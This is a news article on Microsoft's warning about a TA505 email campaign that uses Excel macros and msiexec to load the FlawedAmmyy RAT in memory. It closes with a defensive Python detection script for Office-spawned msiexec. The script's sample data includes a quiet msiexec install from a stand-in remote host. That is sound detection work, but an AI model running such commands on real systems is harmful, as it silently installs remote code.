“The XLS file, when clicked, installs the FlawedAmmyy malware, known for targeting businesses in finances and retail, on the computer”
Microsoft has warned users about a new malware attack disguised as an Excel attachment and targeted at Windows PCs. The Microsoft security team says the XLS attachment uses macros to start a complex infection chain that downloads and runs the notorious FlawedAmmyy RAT directly in memory. According to Proofpoint, the campaign is run by a group called TA505, and FlawedAmmyy is known for targeting businesses in finance and retail.
Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. The attack starts with an email and .xls attachment with content in the Korean language. pic.twitter.com/PQ2g7rvDQm
— Microsoft Security Intelligence (@MsftSecIntel), June 21, 2019
Furthermore, the group frequently uses Microsoft Office attachments and social engineering to compromise victims’ systems. The attack starts with an email containing an Excel attachment which, when opened, automatically runs a macro that launches msiexec.exe, which in turn downloads an MSI archive. “This MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory,” Microsoft notes. Because the final payload runs only in memory, it is not caught by an antivirus that scans only files on disk.
A file called wsus.exe is then downloaded and executed; it is also designed to bypass the official Microsoft Windows Service Update Service (WSUS). It was digitally signed on June 19th and decrypts the payload in RAM, delivering FlawedAmmyy. Since the Excel attachment’s content is in Korean, the campaign may be aimed at Korean Windows users. Microsoft states that “Microsoft Threat Protection defends customers from this attack,” and that Microsoft Defender ATP’s machine-learning systems “blocked all the components of this attack at first sight, including the FlawedAmmyy RAT payload.”
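The chain described above has one step that is easy to see in endpoint telemetry: an Office application spawning msiexec.exe, with a URL on the command line because the MSI is fetched from the network rather than installed from disk. The script below is an added detection example written for this article; it is not Microsoft’s or Proofpoint’s code. The process-creation events, host names and the package-host.invalid URL are all constructed sample data, and the field names (parent_image, image, cmdline) are an assumption about what a Sysmon event 1 or EDR process-start record would carry.

```python
import re

# Constructed sample process-creation events (not real telemetry). The fields
# mirror what a Sysmon event 1 or an EDR process-start record typically carries.
SAMPLE_EVENTS = [
    {"ts": "2019-06-21T09:12:03Z", "host": "ws01",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://package-host.invalid/update.msi /q"},
    {"ts": "2019-06-21T09:15:44Z", "host": "ws02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"},
    {"ts": "2019-06-21T09:20:10Z", "host": "ws03",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\bob\AppData\Local\Temp\inst.msi"},
    {"ts": "2019-06-21T09:22:51Z", "host": "ws01",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]

# Office binaries that should rarely, if ever, launch the Windows Installer.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)/q[nb]?(?:\s|$)", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons this process start matches the Office -> msiexec pattern
    described in the article; an empty list means the rule does not fire."""
    reasons = []
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    cmdline = event.get("cmdline", "")
    if parent in OFFICE_APPS and child == "msiexec.exe":
        reasons.append("office_spawned_msiexec")
        if URL_RE.search(cmdline):
            reasons.append("msiexec_remote_package")   # MSI fetched over HTTP(S)
        if QUIET_RE.search(cmdline):
            reasons.append("quiet_install")            # /q hides the installer UI
    return reasons


def scan(events):
    """Return (ts, host, reasons) for every event the rule fires on."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["ts"], event["host"], reasons))
    return hits


if __name__ == "__main__":
    for ts, host, reasons in scan(SAMPLE_EVENTS):
        print(f"{ts} {host} {', '.join(reasons)}")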